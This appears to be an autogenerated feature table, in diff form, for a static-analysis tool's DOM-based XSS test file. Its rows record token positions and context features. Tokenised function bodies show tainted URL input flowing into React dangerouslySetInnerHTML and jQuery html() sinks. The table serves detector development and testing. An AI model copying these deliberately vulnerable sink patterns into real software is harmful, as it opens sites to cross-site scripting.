autogenerated/Xss/DomBasedXss/tst.js:217:18:217:25 | setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:18:217:25 | setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:217:18:217:25 | setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:18:217:25 | setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:18:217:25 | setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:217:35 | prevState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | 'arguments' object of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | 'arguments' object of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | exceptional return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | exceptional return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | CalleeFlexibleAccessPath | this.setState | | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16951,6 +117368,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | prevSta ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | return of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | return of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:217:27:219:13 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:17 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:17 | $ | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:17 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:17 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:17 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | $('myId') | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:25 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:30 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:30 | $('myId').html | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:30 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:30 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:30 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | $('myId ... inted4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | $('myId ... inted4) | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | $('myId ... inted4) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | $('myId ... inted4) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | $('myId ... inted4) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | exceptional return of $('myId ... inted4) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | exceptional return of $('myId ... inted4) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | exceptional return of $('myId ... inted4) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | exceptional return of $('myId ... inted4) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:17:218:50 | exceptional return of $('myId ... inted4) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16958,6 +117410,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:218:19:218:24 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:27:218:30 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:218:27:218:30 | html | contextSurroundingFunctionParameters | ()\n()\n(prevState) | +| autogenerated/Xss/DomBasedXss/tst.js:218:27:218:30 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:218:27:218:30 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:218:27:218:30 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:218:32:218:40 | prevState | contextFunctionInterfaces | 